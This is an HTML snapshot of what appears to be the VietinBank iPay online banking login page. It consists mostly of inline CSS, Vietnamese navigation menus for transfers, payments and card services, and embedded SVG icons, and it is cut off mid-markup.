.hint{color:#697F90}.personal-information .pl-text-group:first-child .pl-text-group__title{padding-top:0}.personal-information .row-avt{align-items:center}.personal-information .row-avt .avt{display:flex;flex-direction:row;align-items:center;justify-content:space-between;overflow:visible;width:100%}.personal-information .row-avt .avt .avt-box{width:88px;height:88px;min-width:88px;min-height:88px;background-position:center;background-size:cover;border-radius:100%;position:relative;background-color:#C9D9EA;margin-top:-25px;overflow:hidden;border:1px solid #165993}.personal-information .row-avt .avt .avt-box .btn-change{position:absolute;bottom:0;left:0;display:flex;justify-content:center;align-items:center;width:100%;height:26px;background-color:#0000003d}.personal-information .row-avt .avt .avt-box input{width:0;height:0;overflow:hidden}.lucky-code-mgmt__home__lst .promotion{display:block;padding:8px 0;width:fit-content;font-size:14px;font-weight:400;line-height:20px}.lucky-code-mgmt__detail__redirect{margin-top:16px;font-size:14px;font-weight:400;line-height:20px}.lucky-code-mgmt__detail__search{margin:24px 0 12px 0;max-width:326px}@media screen and (max-width: 1023px){.lucky-code-mgmt__detail__table{display:none}}.lucky-code-mgmt__breadcrumbs{cursor:pointer;transform:translateY(-25%);font-size:12px;font-weight:400;line-height:20px;color:#005993}.lucky-code-mgmt__breadcrumbs img{margin-top:-3px;width:16px}.input-wrapper{width:100%}.input-wrapper .input-title{font-style:normal;font-weight:500;font-size:14px;line-height:16px;color:#062A46;margin-bottom:8px}.input-wrapper>input{height:48px;font-style:normal;font-weight:500;line-height:40px;font-size:20px;border:1px solid #C9D9EA}.switch-wrapper{display:flex;flex-direction:row;align-items:center}.switch-wrapper .switch{position:relative;display:inline-block;width:34px;height:18px}.switch-wrapper .switch input{opacity:0;width:0;height:0}.switch-wrapper .slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#E7EEF3;transition:.4s}.switch-wrapper .slider:before{position:absolute;content:"";height:10.91px;width:10.91px;left:4px;bottom:4px;background-color:#005993;transition:.4s}.switch-wrapper input:checked+.slider{background-color:#2196F3}.switch-wrapper input:focus+.slider{box-shadow:0 0 1px #2196F3}.switch-wrapper input:checked+.slider:before{transform:translateX(16px)}.switch-wrapper .slider.round{border-radius:34px}.switch-wrapper .slider.round:before{border-radius:50%}.security-content{padding-top:32px}.security-content__title{font-size:20px;font-weight:600;line-height:30px;color:#062A46;margin-bottom:16px}.security-content__box{border-bottom:1px solid #C9D9EA}.security-content .otp-switch{display:flex;flex-direction:row;align-items:center}.security-content .otp-switch-title{margin-right:16px}.security-content .otp-quote{font-style:normal;font-weight:normal;font-size:16px;line-height:24px;color:#9EB3C9}.security-content .hint--new-password{font-size:12px;font-weight:400;line-height:20px;color:#697F90}.modal-add-schedule-bill .modal-container{width:100%;max-width:808px}.modal-add-schedule-bill .modal-container .schedule-bill-success{position:relative}.modal-add-schedule-bill .modal-container .schedule-bill-success__wrap-qrcode{position:absolute;right:32px}.schedule-payment{padding-top:32px}.schedule-payment .bill-list{margin-top:8px;overflow-x:auto}.schedule-payment .bill-list .table-bill{width:100%}.schedule-payment .bill-list .table-bill .row{display:flex;flex-direction:row;align-items:center;position:relative}.schedule-payment .bill-list .table-bill .row .column{padding:16px;font-size:14px;font-weight:400;line-height:20px;color:#062A46}.schedule-payment .bill-list .table-bill .row .column:nth-child(1){flex:0 0 25%}.schedule-payment .bill-list .table-bill .row .column:nth-child(2){flex:0 0 25%}.schedule-payment .bill-list .table-bill .row .column:nth-child(3){flex:0 0 25%}.schedule-payment .bill-list .table-bill .row .column:nth-child(4){flex:0 0 25%}.schedule-payment .bill-list .table-bill .row:nth-of-type(even){background-color:#F4F8FB}.schedule-payment .bill-list .table-bill .row.head .column{color:#062A46;font-size:16px;font-weight:500;line-height:22px;text-transform:uppercase;border-bottom:1px solid #C9D9EA}.schedule-payment .bill-list .table-bill .row:hover .column{color:#005993}.schedule-payment .bill-list .table-bill .row:hover .action{display:flex}.schedule-payment .bill-list .table-bill .row .action{position:absolute;top:0;right:0;height:100%;background-color:white;padding:16px;display:none;justify-content:center;align-items:center}.schedule-payment .bill-list .table-bill .row .action .btn-delete{width:44px;height:44px;display:flex;justify-content:center;align-items:center;background-color:#EA114E;border-radius:100%;cursor:pointer}@media screen and (max-width: 1023px){.schedule-payment__table{display:none}}.modal-schedule-bill-details .modal-container{width:100%;max-width:808px}.modal-schedule-bill-details .modal-container .head-info{padding:0 32px}.modal-schedule-bill-details .modal-container .head-info .title{color:#062A46;padding-right:136px}.modal-schedule-bill-details .modal-container .head-info .time{font-size:14px;font-weight:400;line-height:20px;color:#9EB3C9}.modal-schedule-bill-details .modal-container .body-detail{position:relative}.modal-schedule-bill-details .modal-container .body-detail .container-qr{position:absolute;top:-60px;right:32px;z-index:1}.modal-schedule-bill-details .modal-container .body-detail .head-info{padding:0 32px}.modal-schedule-bill-details .modal-container .body-detail .head-info .name{color:#062A46}.modal-schedule-bill-details .modal-container .body-detail .head-info .hintName,.modal-schedule-bill-details .modal-container .body-detail .head-info .status{font-size:14px;font-weight:400;line-height:20px;margin-top:8px}.modal-schedule-bill-details .modal-container .body-detail .head-info .hintName{color:#9EB3C9}.modal-schedule-bill-details .modal-container .body-detail .head-info .due{color:#EA114E}.modal-schedule-bill-details .modal-container .body-detail .details{margin-top:16px;padding:0 32px;min-height:343px;background-image:url("/static/image/logo/logonotext-transparent.png");background-size:contain;background-repeat:no-repeat;background-position:center;background-color:#F4F8FB}.modal-schedule-bill-details .modal-container .body-detail .details .row{display:flex;padding:15px 0;border-bottom:1px dashed #C9D9EA}.modal-schedule-bill-details .modal-container .body-detail .details .row:last-child{border-bottom:none}.modal-schedule-bill-details .modal-container .body-detail .details .row .label{flex:0 0 30%;color:#062A46;padding-right:24px}.modal-schedule-bill-details .modal-container .body-detail .details .row .value{flex:0 0 calc(70% - 24px);font-size:16px;font-weight:500;line-height:22px;color:#062A46}.modal-schedule-bill-details .modal-container .body-detail .details .row:first-child .value{padding-right:136px}.transfer-mgt__head{display:flex;flex-direction:row;align-items:center;flex-wrap:wrap}.transfer-mgt__head>span{margin-bottom:8px}.transfer-mgt__head>button{margin-bottom:8px;margin-left:auto}.modal-new-schedule-transfer .modal-container{width:100%;max-width:808px}.modal-new-schedule-transfer .schedule-body{background-color:#F4F8FB}.modal-new-schedule-transfer .body-success{position:relative}.modal-new-schedule-transfer .body-success__qrcode{position:absolute;top:16px;right:32px}.schedule-transfer{padding-top:32px}.schedule-transfer .filter{margin-top:24px}.schedule-transfer .filter .label-2,.schedule-transfer .filter .lucky-num__type .lucky-type-radio,.lucky-num__type .schedule-transfer .filter .lucky-type-radio,.schedule-transfer .filter .payment-form__content__detail-bill .list-bill__footer .value,.payment-form__content__detail-bill .list-bill__footer .schedule-transfer .filter .value{color:#062A46}.schedule-transfer .filter .input-filter{margin-top:8px;display:flex;flex-direction:row}.schedule-transfer .filter .input-filter .wrap-input-select{width:208px}.schedule-transfer .filter .input-filter .input-fill-group{flex:1}@media screen and (max-width: 1023px){.schedule-transfer .filter .input-filter{flex-wrap:wrap}.schedule-transfer .filter .input-filter .wrap-input-select{flex-basis:100%}.schedule-transfer .filter .input-filter .input-fill-group{margin-top:8px;flex-basis:100%}}.schedule-transfer .transfer-list{margin-top:8px;overflow-x:auto}@media screen and (max-width: 1023px){.schedule-transfer .transfer-list__table{display:none}}.modal-schedule-transfer-details .modal-container{width:100%;max-width:808px}.vertical-layout{display:flex;flex-direction:row}.vertical-layout .vertical-layout__tab{padding:32px 0}.vertical-layout .vertical-layout__content{flex:1 1 auto;padding:40px 32px}.transfer{padding:40px 64px}.transfer .transfer-content{border-radius:10px;margin-top:24px}.transfer .transfer-content .hide{display:none}.transfer .transfer-content .otp-content{-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.02);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.02);box-shadow:0px 8px 10px rgba(32,71,101,0.02);background-color:white;padding:32px}.transfer .transfer-content .otp-content .otp-list .otp-row{padding:10px 0;border-bottom:1px dashed #C9D9EA}.transfer .transfer-content .otp-content .otp-row{display:flex;flex-direction:row;align-items:center}.transfer .transfer-content .otp-content .otp-row .otp-col{color:#062A46;display:flex;align-items:center;align-self:center}.transfer .transfer-content .otp-content .otp-row .otp-col__span{white-space:nowrap}.transfer .transfer-content .otp-content .otp-row .otp-col:nth-child(1){flex:3;margin-right:20px}.transfer .transfer-content .otp-content .otp-row .otp-col:nth-child(2){flex:9;font-size:16px;font-weight:500;line-height:22px}.transfer .transfer-content .otp-content .otp-from .detail-account{width:100%;max-width:480px}.transfer .transfer-content .otp-content .otp-from .detail-account .name{padding:0px 0px 14px 0px;border-bottom:1px solid #005993;color:#062A46}.transfer .transfer-content .otp-content .otp-from .detail-account .balance{margin-top:8px;display:flex;flex-direction:row;align-items:center;justify-content:space-between;color:#062A46}.transfer .transfer-content .otp-content .otp-from .detail-account .balance .label{margin-bottom:0px}.transfer .transfer-content .otp-content .otp-from .label{margin-bottom:27px}.transfer .transfer-content .otp-content .otp-input{margin-top:24px}.transfer .transfer-content .otp-content .otp-input .label{color:#005993}.transfer .transfer-content .otp-content .otp-input .input{margin-top:24px}.transfer .transfer-content .otp-content .otp-to{margin-top:36px}.transfer .transfer-content .otp-content .otp-to .label{margin-bottom:27px}.transfer .transfer-content .otp-content .otp-action{margin-top:40px;text-align:right;border-top:1px solid #C9D9EA;padding-top:32px}.transfer .transfer-content .otp-content .otp-action .btn-back{background-color:transparent;color:#9EB3C9}.transfer .transfer-content .otp-content .otp-action>*{margin-right:16px}.transfer .transfer-content .otp-content .otp-action>*:nth-last-child(1){margin-right:0}.transfer .transfer-content .transfer-form{-webkit-box-shadow:0px 8px 10px rgba(32,71,101,0.02);-moz-box-shadow:0px 8px 10px rgba(32,71,101,0.02);box-shadow:0px 8px 10px rgba(32,71,101,0.02);padding:32px;background-color:white}.transfer .transfer-content .transfer-form .date-from-to{display:flex;flex-direction:row;align-items:center}.transfer .transfer-content .transfer-form .date-from-to>*{margin-right:24px;flex:1;height:48px;border-color:#C9D9EA}.transfer .transfer-content .transfer-form .date-from-to>*:nth-last-child(1){margin-right:0}.transfer .transfer-content .transfer-form .title{margin-bottom:16px}.transfer .transfer-content .transfer-form .trans-row{margin-bottom:24px;display:flex;flex-direction:row}.transfer .transfer-content .transfer-form .trans-row .trans-col:nth-child(1){flex:3;margin-right:16px}.transfer .transfer-content .transfer-form .trans-row .trans-col:nth-child(2){flex:9}.transfer .transfer-content .transfer-form .trans-row .trans-col:nth-child(2)>*{max-width:512px}.transfer .transfer-content .transfer-form .break-line{border-bottom:1px solid #C9D9EA;margin-top:40px}.transfer .transfer-content .transfer-form .function{margin-top:32px;text-align:right}.transfer .transfer-content .transfer-form .function>*{margin-right:16px}.transfer .transfer-content .transfer-form .function>*:last-child{margin-right:0}.transfer .transfer-content .transfer-form .function .btn-clear{background-color:transparent;color:#9EB3C9}.transfer .transfer-content .transfer-form .function .btn-continue:disabled{background-color:#E7EEF3;color:#9EB3C9}.transfer-currency--checkAccept{display:inline-flex;flex-flow:row;align-items:center;font-size:16px;line-height:16px;cursor:pointer}.transfer-currency--checkAccept img{margin-right:10px}.transfer-external-tab{margin-top:16px}.transfer-external .transfer-external__otp-form{color:#005993}.transfer-external .transfer-external__otp-form>*{margin-top:24px;white-space:pre-wrap}.transfer-external .date-from-to>*{flex:1}.transfer-external .date-from-to>*:not(:first-child){margin-left:16px}@media screen and (max-width: 1023px){.transfer-external .date-from-to{flex-direction:column}.transfer-external .date-from-to>*{flex:1}.transfer-external .date-from-to>*:not(:first-child){margin-left:0;margin-top:12px}}.btn-savebill{margin-right:24px}.transfer-internal__otp-form{color:#005993}.transfer-internal__otp-form>*{margin-top:24px;white-space:pre-wrap}.transfer-internal .transfer-date{width:100%}.transfer-internal .date-from-to>*{flex:1}.transfer-internal .date-from-to>*:not(:first-child){margin-left:16px}@media screen and (max-width: 1023px){.transfer-internal .date-from-to{flex-direction:column}.transfer-internal .date-from-to>*{flex:1}.transfer-internal .date-from-to>*:not(:first-child){margin-left:0;margin-top:12px}}.modal-stock-confirm__content{text-align:center;padding:72px}.modal-stock-confirm__content .stock-message{margin-top:24px}.transfer-success-wrapper .payment-history__modal-transaction{width:100%}.transfer-stock .transfer-stock__otp-form{color:#005993}.transfer-stock .transfer-stock__otp-form>*{margin-top:24px}.western-union__btn--manual{color:#005993;font-size:16px;font-weight:500;line-height:24px;cursor:pointer}.western-union__manual{padding:32px 32px 36px 32px}.western-union__manual__title{font-size:20px;font-weight:600;line-height:30px;margin-bottom:24px}@media (min-width: 1200px){.western-union__manual__block:nth-child(1),.western-union__manual__block:nth-child(2){padding-bottom:32px;border-bottom:1px dashed #C9D9EA}.western-union__manual__block:nth-child(3),.western-union__manual__block:nth-child(4){padding-top:32px}.western-union__manual__block:nth-child(2n){border-left:1px dashed #C9D9EA;padding-left:32px}.western-union__manual__block:nth-child(2n+1){padding-right:32px}}@media (max-width: 1199px){.western-union__manual__block:not(:first-child){margin-top:32px;padding-top:32px;border-top:1px dashed #C9D9EA}}.western-union__manual__block__icon{margin-bottom:16px;width:64px;height:64px;border-radius:50%;background-color:#F4F8FB;display:flex;justify-content:center;align-items:center}.western-union__manual__block__title{font-size:18px;font-weight:500;line-height:24px;margin-bottom:16px}.western-union__manual__block__ul{list-style:none;margin:0;padding-inline-start:0px}.western-union__manual__block__ul li{position:relative;padding-left:1em;text-indent:-1em}.western-union__manual__block__ul li:not(:first-child){margin-top:16px}.western-union__manual__block__ul li::before{content:'';display:inline-block;width:0;height:0;border-top:5px solid transparent;border-bottom:5px solid transparent;border-left:8px solid #EA114E;margin-right:8px}.western-union__term__body__title{padding:32px 0 24px 0;font-size:20px;font-weight:600;line-height:30px}.western-union__term__body__content{white-space:pre-wrap}.welcome-page{position:fixed;top:0;left:0;bottom:0;right:0;display:flex;flex-direction:row}.welcome-page__content{flex:1;background-image:url("/static/image/background/welcome-page.svg");background-repeat:no-repeat;background-size:cover;background-color:#005993;padding:32px 40px}.welcome-page__content .content-box{flex:1;margin-top:64px;display:flex;flex-direction:column}.welcome-page__content .content-box__main{flex:1;display:flex;justify-content:center;align-items:center}.welcome-page__content .content-box__main img{object-fit:contain;max-width:100%}.welcome-page__content .content-box .label-guide{color:#8FD7F6}.welcome-page__content .content-box .embed{width:90%;height:80%}.welcome-page__content__action{display:flex;justify-content:space-between;align-items:center}.welcome-page__content .welcome-user{color:white}.welcome-page__content .welcome-user .username{color:#79CCF3}.welcome-page__nav{flex-basis:40%;min-width:336px;overflow-y:auto;display:flex;flex-direction:column}.welcome-page__nav .welcome-page__nav__item{flex:1;padding:32px;display:flex;flex-direction:column;justify-content:center;cursor:pointer}.welcome-page__nav .welcome-page__nav__item:not(:nth-last-child(1)){border-bottom:1px solid #C9D9EA}.welcome-page__nav .welcome-page__nav__item .main-content{white-space:pre-wrap;display:none}.welcome-page__nav .welcome-page__nav__item .btn-toggle{width:44px;height:44px;background-image:url("/static/image/icon/44px/arrow/black-next.svg");transition:all .3s}.welcome-page__nav .welcome-page__nav__item.active{cursor:default;border-bottom:2px solid #EA114E}.welcome-page__nav .welcome-page__nav__item.active .btn-toggle{background-image:url("/static/image/icon/44px/arrow/red-next.svg");transform:rotateZ(90deg)}.welcome-page__nav .welcome-page__nav__item.active .main-content{display:block}.welcome-page__nav .welcome-page__nav__item.active .stt{color:#EA114E} </style><script charset="utf-8" src="/static/js/9.fd135868fa43dd7582b5.js"></script><script charset="utf-8" src="/static/js/44.fd135868fa43dd7582b5.js"></script></head> <body> <noscript> You need to enable JavaScript to run this app. </noscript> <div id="root"><div id="app" class="app" style=""><div class="main-header hidden"><div class="main-header__content"><div class="wrap-content"><div class="app-logo"><img src="https://static-ipay.vietinbank.vn/production/Setting/HEADER/6680852495249-VietiniPay_standard.svg" alt="logo"></div><ul class="main-menu noselect"><li class="submenu "><div class="title oneline-text">Chuyển tiền<span class="bottom-line"></span></div><ul class="inner-menu"><li class="option label-3 ">Chuyển tiền trong VietinBank</li><li class="option label-3 ">Liên ngân hàng</li><li class="option label-3 ">Chứng khoán</li><li class="option label-3 ">Từ thiện</li><li class="option label-3 ">Bán ngoại tệ</li><li class="option label-3 ">Nhận tiền Western Union</li><li class="option label-3 ">Đặt lịch chuyển tiền</li></ul></li><li class="submenu "><div class="title oneline-text">Thanh toán<span class="bottom-line"></span></div><ul class="inner-menu"><li class="option label-3 ">Thanh toán hóa đơn</li><li class="option label-3 ">Nạp tiền điện thoại</li><li class="option label-3 ">Trả nợ thẻ tín dụng</li><li class="option label-3 ">Trả nợ khoản vay</li><li class="option label-3 ">Nộp thuế điện tử</li><li class="option label-3 ">Nộp phí kết cấu hạ tầng</li><li class="option label-3 ">Đặt lịch thanh toán</li></ul></li><li class="submenu "><div class="title oneline-text">Đầu tư<span class="bottom-line"></span></div><ul class="inner-menu"><li class="option label-3 ">Tiết kiệm Online</li><li class="option label-3 ">Tất toán tiết kiệm</li><li class="option label-3 ">Đổi phương thức đáo hạn</li><li class="option label-3 ">Thông tin thị trường</li><li class="option label-3 ">Đặt mua trái phiếu</li><li class="option label-3 ">Mở tài khoản theo yêu cầu</li></ul></li><li class="submenu "><div class="title oneline-text">Mua sắm<span class="bottom-line"></span></div><ul class="inner-menu"><li class="option label-3 ">Mua vé máy bay</li><li class="option label-3 ">Mua sắm VnShop</li><li class="option label-3 ">Bảo hiểm VBI</li></ul></li><li class="submenu "><div class="title oneline-text">Dịch vụ thẻ<span class="bottom-line"></span></div><ul class="inner-menu"><li class="option label-3 ">ĐK thanh toán trực tuyến</li><li class="option label-3 ">Cài đặt SMS</li><li class="option label-3 ">Cài đặt phạm vi, hạn mức</li><li class="option label-3 ">ĐK trích nợ tự động</li><li class="option label-3 ">Ưu đãi thẻ</li><li class="option label-3 ">Khoá thẻ</li><li class="option label-3 ">Cấp/đổi PIN</li></ul></li></ul><div class="menu-mobile__backdrop"></div><div class="menu-mobile"><div class="accordion"><div class="accordion__item"><div class="accordion__summary"><div class="cms-flex x-between y-center menu-mobile__menu m-label-l"><div>Chuyển tiền</div><img src="/static/image/icon/24px/arrow-white/next.svg" alt="icon" class="menu-mobile__menu__icon"></div></div><div class="accordion__details__wrap" style="max-height: 0px;"><div class="accordion__details"><div class="menu-mobile__submenu"><div class="submenu__item m-label-m ">Chuyển tiền trong VietinBank</div><div class="submenu__item m-label-m ">Liên ngân hàng</div><div class="submenu__item m-label-m ">Chứng khoán</div><div class="submenu__item m-label-m ">Từ thiện</div><div class="submenu__item m-label-m ">Bán ngoại tệ</div><div class="submenu__item m-label-m ">Nhận tiền Western Union</div><div class="submenu__item m-label-m ">Đặt lịch chuyển tiền</div></div></div></div></div><div class="accordion__item"><div class="accordion__summary"><div class="cms-flex x-between y-center menu-mobile__menu m-label-l"><div>Thanh toán</div><img src="/static/image/icon/24px/arrow-white/next.svg" alt="icon" class="menu-mobile__menu__icon"></div></div><div class="accordion__details__wrap" style="max-height: 0px;"><div class="accordion__details"><div class="menu-mobile__submenu"><div class="submenu__item m-label-m ">Thanh toán hóa đơn</div><div class="submenu__item m-label-m ">Nạp tiền điện thoại</div><div class="submenu__item m-label-m ">Trả nợ thẻ tín dụng</div><div class="submenu__item m-label-m ">Trả nợ khoản vay</div><div class="submenu__item m-label-m ">Nộp thuế điện tử</div><div class="submenu__item m-label-m ">Nộp phí kết cấu hạ tầng</div><div class="submenu__item m-label-m ">Đặt lịch thanh toán</div></div></div></div></div><div class="accordion__item"><div class="accordion__summary"><div class="cms-flex x-between y-center menu-mobile__menu m-label-l"><div>Đầu tư</div><img src="/static/image/icon/24px/arrow-white/next.svg" alt="icon" class="menu-mobile__menu__icon"></div></div><div class="accordion__details__wrap" style="max-height: 0px;"><div class="accordion__details"><div class="menu-mobile__submenu"><div class="submenu__item m-label-m ">Tiết kiệm Online</div><div class="submenu__item m-label-m ">Tất toán tiết kiệm</div><div class="submenu__item m-label-m ">Đổi phương thức đáo hạn</div><div class="submenu__item m-label-m ">Thông tin thị trường</div><div class="submenu__item m-label-m ">Đặt mua trái phiếu</div><div class="submenu__item m-label-m ">Mở tài khoản theo yêu cầu</div></div></div></div></div><div class="accordion__item"><div class="accordion__summary"><div class="cms-flex x-between y-center menu-mobile__menu m-label-l"><div>Mua sắm</div><img src="/static/image/icon/24px/arrow-white/next.svg" alt="icon" class="menu-mobile__menu__icon"></div></div><div class="accordion__details__wrap" style="max-height: 0px;"><div class="accordion__details"><div class="menu-mobile__submenu"><div class="submenu__item m-label-m ">Mua vé máy bay</div><div class="submenu__item m-label-m ">Mua sắm VnShop</div><div class="submenu__item m-label-m ">Bảo hiểm VBI</div></div></div></div></div><div class="accordion__item"><div class="accordion__summary"><div class="cms-flex x-between y-center menu-mobile__menu m-label-l"><div>Dịch vụ thẻ</div><img src="/static/image/icon/24px/arrow-white/next.svg" alt="icon" class="menu-mobile__menu__icon"></div></div><div class="accordion__details__wrap" style="max-height: 0px;"><div class="accordion__details"><div class="menu-mobile__submenu"><div class="submenu__item m-label-m ">ĐK thanh toán trực tuyến</div><div class="submenu__item m-label-m ">Cài đặt SMS</div><div class="submenu__item m-label-m ">Cài đặt phạm vi, hạn mức</div><div class="submenu__item m-label-m ">ĐK trích nợ tự động</div><div class="submenu__item m-label-m ">Ưu đãi thẻ</div><div class="submenu__item m-label-m ">Khoá thẻ</div><div class="submenu__item m-label-m ">Cấp/đổi PIN</div></div></div></div></div></div><button class="app-btn b-medium b-empty menu-mobile__btn-logout mt-auto text-white"><img src="/static/image/icon/24px/logout-white.svg" alt="icon" class="mr-2">Đăng xuất</button></div><div class="main-header__actions"><div class="language-switch ml-8"><img class="pointer" src="data:image/svg+xml,%3Csvg width='24' height='24' viewBox='0 0 24 24' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Ccircle cx='12' cy='12' r='12' fill='white'/%3E %3Cpath fill-rule='evenodd' clip-rule='evenodd' d='M14.2144 14.6773V22.9234C14.2144 22.9234 14.2144 22.9235 14.2144 22.9235V23.7923C13.5006 23.9259 12.7658 23.9991 12.0134 24C12.0088 24 12.0042 24 11.9996 24C11.8001 24 11.6008 23.9945 11.4013 23.9849C10.811 23.9553 10.2318 23.8827 9.66683 23.7713V16.824L4.85229 21.6386C4.40642 21.3074 3.98522 20.9455 3.58961 20.5569L9.63101 14.5155H0.266002C0.0932275 13.7039 0 12.8633 0 12.0002C0 11.3071 0.0621686 10.6292 0.1747 9.9683H7.35803L6.32994 8.94057L2.31138 4.92201C2.63996 4.4735 2.99899 4.04911 3.38497 3.65082L9.66698 9.93268V0.228357C10.232 0.11694 10.8108 0.0443337 11.4011 0.0147948C11.6009 0.00511738 11.8003 0 11.9998 0C12.7572 0 13.4965 0.0733154 14.2144 0.207279V1.07652C14.2144 1.07654 14.2144 1.07656 14.2145 1.07657V7.65854L16.278 5.59461C16.278 5.59468 16.2781 5.59475 16.2781 5.59482L19.3526 2.51983C19.7906 2.85996 20.2048 3.22922 20.5912 3.62599L16.3 7.9172C16.3 7.91715 16.3 7.91711 16.2999 7.91706L14.2489 9.9681H16.6143H16.9053H23.8253C23.9382 10.6292 24 11.3071 24 12.0002C24 12.8631 23.9072 13.7039 23.734 14.5155H16.8708H16.5798H16.3971L16.6005 14.7188L16.8331 14.9515L17.425 15.5432L21.372 19.4905C21.0256 19.9231 20.6499 20.3304 20.248 20.7113L16.1859 16.6492C16.1859 16.6491 16.1859 16.649 16.1859 16.649L14.2144 14.6773Z' fill='%23E51D35'/%3E %3Cpath fill-rule='evenodd' clip-rule='evenodd' d='M16.1661 5.22976L15.8999 5.49591L15.8999 5.49582L15.2419 6.15352V3.21016L15.2419 3.21006V0.446777C16.6419 0.838992 17.9387 1.47694 19.0818 2.31406L16.1819 5.21395L16.1661 5.22976ZM8.63929 0.480318C7.25669 0.88297 5.97623 1.52548 4.84869 2.36351L8.63929 6.15412V0.480318ZM0.394897 8.94035C0.751493 7.58486 1.33959 6.3237 2.11342 5.20052L5.85347 8.94035H0.394897ZM8.6393 23.5193C7.36983 23.1496 6.18823 22.5767 5.1306 21.8366L8.6393 18.3285V23.5193ZM0.53261 15.5432C0.929384 16.8284 1.53739 18.0208 2.31442 19.0814L5.85266 15.5432H0.53261ZM23.6052 8.94056C23.241 7.55644 22.6352 6.27162 21.837 5.1308L18.0268 8.94056H23.6052ZM15.2419 23.5529V21.3819V20.8629V18.3289L15.8846 18.9715L15.8846 18.9714L18.7993 21.8861C17.7269 22.6254 16.5279 23.1929 15.2419 23.5529ZM23.4678 15.5432C23.0621 16.8566 22.4376 18.0734 21.6363 19.1514L18.0282 15.5432H23.4678Z' fill='%2329337A'/%3E %3Ccircle cx='12' cy='12' r='11.5' stroke='white'/%3E %3C/svg%3E"></div><img class="ml-8 pointer btn-logout" src="/static/image/icon/24px/logout-white.svg"><img class="ml-8 pointer btn-toggle " src="data:image/svg+xml,%3Csvg width='24' height='24' viewBox='0 0 24 24' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Cline x1='20' y1='21' x2='8' y2='21' stroke='white' stroke-width='2' stroke-linecap='round'/%3E %3Cline x1='20' y1='13' x2='2' y2='13' stroke='white' stroke-width='2' stroke-linecap='round'/%3E %3Cline x1='20' y1='5' x2='8' y2='5' stroke='white' stroke-width='2' stroke-linecap='round'/%3E %3C/svg%3E"></div></div></div></div><div class="app-container no-header"><div class="main-container full-width"><div class="wrap-layout" style="background-image: url("https://static-ipay.vietinbank.vn/production/Setting/AUTH_LAYOUT/410253235323-image.jpeg");"><div class="auth-layout "><div class="cms-flex cms-flex__wrap x-between y-center auth-layout-header"><div class="auth-layout-header-img"><img class="logo" alt="logo" src="https://static-ipay.vietinbank.vn/production/Setting/HEADER/6680852495249-VietiniPay_standard.svg"></div><div class="auth-layout-header__end"><span class="auth-layout-header-hotline label-2">Số điện thoại hỗ trợ: 1900-55-88-68</span><div class="language-switch select-lang ml-6"><img class="pointer" src="data:image/svg+xml,%3Csvg width='24' height='24' viewBox='0 0 24 24' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Ccircle cx='12' cy='12' r='12' fill='white'/%3E %3Cpath fill-rule='evenodd' clip-rule='evenodd' d='M14.2144 14.6773V22.9234C14.2144 22.9234 14.2144 22.9235 14.2144 22.9235V23.7923C13.5006 23.9259 12.7658 23.9991 12.0134 24C12.0088 24 12.0042 24 11.9996 24C11.8001 24 11.6008 23.9945 11.4013 23.9849C10.811 23.9553 10.2318 23.8827 9.66683 23.7713V16.824L4.85229 21.6386C4.40642 21.3074 3.98522 20.9455 3.58961 20.5569L9.63101 14.5155H0.266002C0.0932275 13.7039 0 12.8633 0 12.0002C0 11.3071 0.0621686 10.6292 0.1747 9.9683H7.35803L6.32994 8.94057L2.31138 4.92201C2.63996 4.4735 2.99899 4.04911 3.38497 3.65082L9.66698 9.93268V0.228357C10.232 0.11694 10.8108 0.0443337 11.4011 0.0147948C11.6009 0.00511738 11.8003 0 11.9998 0C12.7572 0 13.4965 0.0733154 14.2144 0.207279V1.07652C14.2144 1.07654 14.2144 1.07656 14.2145 1.07657V7.65854L16.278 5.59461C16.278 5.59468 16.2781 5.59475 16.2781 5.59482L19.3526 2.51983C19.7906 2.85996 20.2048 3.22922 20.5912 3.62599L16.3 7.9172C16.3 7.91715 16.3 7.91711 16.2999 7.91706L14.2489 9.9681H16.6143H16.9053H23.8253C23.9382 10.6292 24 11.3071 24 12.0002C24 12.8631 23.9072 13.7039 23.734 14.5155H16.8708H16.5798H16.3971L16.6005 14.7188L16.8331 14.9515L17.425 15.5432L21.372 19.4905C21.0256 19.9231 20.6499 20.3304 20.248 20.7113L16.1859 16.6492C16.1859 16.6491 16.1859 16.649 16.1859 16.649L14.2144 14.6773Z' fill='%23E51D35'/%3E %3Cpath fill-rule='evenodd' clip-rule='evenodd' d='M16.1661 5.22976L15.8999 5.49591L15.8999 5.49582L15.2419 6.15352V3.21016L15.2419 3.21006V0.446777C16.6419 0.838992 17.9387 1.47694 19.0818 2.31406L16.1819 5.21395L16.1661 5.22976ZM8.63929 0.480318C7.25669 0.88297 5.97623 1.52548 4.84869 2.36351L8.63929 6.15412V0.480318ZM0.394897 8.94035C0.751493 7.58486 1.33959 6.3237 2.11342 5.20052L5.85347 8.94035H0.394897ZM8.6393 23.5193C7.36983 23.1496 6.18823 22.5767 5.1306 21.8366L8.6393 18.3285V23.5193ZM0.53261 15.5432C0.929384 16.8284 1.53739 18.0208 2.31442 19.0814L5.85266 15.5432H0.53261ZM23.6052 8.94056C23.241 7.55644 22.6352 6.27162 21.837 5.1308L18.0268 8.94056H23.6052ZM15.2419 23.5529V21.3819V20.8629V18.3289L15.8846 18.9715L15.8846 18.9714L18.7993 21.8861C17.7269 22.6254 16.5279 23.1929 15.2419 23.5529ZM23.4678 15.5432C23.0621 16.8566 22.4376 18.0734 21.6363 19.1514L18.0282 15.5432H23.4678Z' fill='%2329337A'/%3E %3Ccircle cx='12' cy='12' r='11.5' stroke='white'/%3E %3C/svg%3E"></div></div></div><div class="cms-flex cms-flex__wrap x-between y-center auth-layout-content"><div class="auth-layout-content-quote"><img src="data:image/svg+xml,%3Csvg width='21' height='17' viewBox='0 0 21 17' fill='none' xmlns='http://www.w3.org/2000/svg'%3E %3Cpath opacity='0.3' d='M11.4766 11.6016C11.4766 10.4297 11.623 9.25781 11.916 8.08594C12.2415 6.91406 12.7135 5.83984 13.332 4.86328C13.9831 3.85417 14.7643 2.99154 15.6758 2.27539C16.5872 1.55924 17.6615 1.07096 18.8984 0.810547L20.2168 2.32422C19.3704 2.77995 18.6055 3.44727 17.9219 4.32617C17.2383 5.17253 16.8639 6.10026 16.7988 7.10938C17.9056 7.27214 18.8171 7.79297 19.5332 8.67188C20.2493 9.51823 20.6074 10.4948 20.6074 11.6016C20.6074 12.2526 